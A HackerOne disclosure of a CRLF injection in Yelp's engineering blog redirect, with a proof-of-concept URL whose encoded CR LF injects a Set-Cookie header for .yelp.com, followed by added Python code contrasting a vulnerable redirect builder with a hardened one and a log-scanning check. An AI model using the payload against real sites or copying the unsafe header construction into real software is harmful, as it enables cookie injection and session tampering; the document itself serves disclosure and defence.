Yelp: [engineeringblog.yelp.com] CRLF Injection

2015-06-07T09:02:26
ID H1:66391
Type hackerone
Reporter bobrov
Modified 2017-11-09T20:12:42

Description

CRLF Injection via Request-URI

PoC:

Request:

https://engineeringblog.yelp.com/xxcrlftest%0d%0aSet-Cookie:%20test=test;domain=.yelp.com

HTTP Response:

HTTP/1.1 301 Moved Permanently
...
Location: http://engineeringblog.yelp.com/xxcrlftest
Set-Cookie: test=test;domain=.yelp.com

Result: Creating a cookie-param "test=test" on *.yelp.com
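The mechanism behind the PoC, as an added example that is not part of the report or of Yelp's code: a minimal redirect handler that pastes the percent-decoded request path into the Location header (the defect), beside a hardened version that refuses control characters and re-encodes the target before it reaches the wire. The host name and request paths are constructed test inputs modelled on the PoC; `parse_response` and `request_uri_has_crlf` are hypothetical helpers written here for the demonstration.

```python
"""Added example (not part of the HackerOne report or Yelp's code): a minimal
redirect handler reproducing the CRLF header-splitting defect described in
the report, beside a hardened version that refuses control characters in the
redirect target. Host name and request paths are constructed test data."""
from urllib.parse import quote, unquote

HOST = "engineeringblog.yelp.com"
# Constructed inputs: a benign path and a path modelled on the report's PoC.
CLEAN_PATH = "/xxcrlftest"
INJECTED_PATH = "/xxcrlftest%0d%0aSet-Cookie:%20test=test;domain=.yelp.com"


def build_redirect_vulnerable(host, raw_path):
    """Defect: the percent-decoded path is pasted straight into the header
    block, so an encoded CR LF in the URI terminates the Location line and
    whatever follows is emitted as a further response header."""
    location = "http://" + host + unquote(raw_path)
    return "HTTP/1.1 301 Moved Permanently\r\nLocation: " + location + "\r\n\r\n"


class BadRedirectTarget(ValueError):
    """Raised when a redirect target cannot be placed in a header safely."""


def safe_location(host, raw_path):
    """Decode once, reject any control character (CR, LF, NUL, ...), then
    re-encode so only printable, header-safe characters reach the wire."""
    decoded = unquote(raw_path)
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in decoded):
        raise BadRedirectTarget("control character in redirect target")
    # Re-encoding also neutralises double-encoded sequences: a '%0d' that
    # survives one decode becomes the literal text '%250d', never a CR byte.
    return "http://" + host + quote(decoded, safe="/-._~!$&'()*+,;=:@")


def build_redirect_hardened(host, raw_path):
    """Same redirect, but the target is validated; a bad one gets a 400
    with no Location header at all."""
    try:
        location = safe_location(host, raw_path)
    except BadRedirectTarget:
        return "HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return "HTTP/1.1 301 Moved Permanently\r\nLocation: " + location + "\r\n\r\n"


def parse_response(raw):
    """Split a raw HTTP/1.1 response head into (status line, {header: value}),
    the way a client would see it."""
    head, _, _ = raw.partition("\r\n\r\n")
    status, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return status, headers


def request_uri_has_crlf(raw_uri):
    """Log-review helper: True if a request URI carries CR or LF either raw
    or under one layer of percent-encoding."""
    return any(ch in ("\r", "\n") for ch in raw_uri + unquote(raw_uri))


if __name__ == "__main__":
    for builder in (build_redirect_vulnerable, build_redirect_hardened):
        status, headers = parse_response(builder(HOST, INJECTED_PATH))
        print(builder.__name__, status, sorted(headers))
```

Run as a script, the vulnerable builder shows a 301 whose parsed headers include both Location and the injected Set-Cookie; the hardened builder answers the same request with a 400 and no Location at all. The `request_uri_has_crlf` check is the same test applied to access-log request lines when looking for attempts against a redirector.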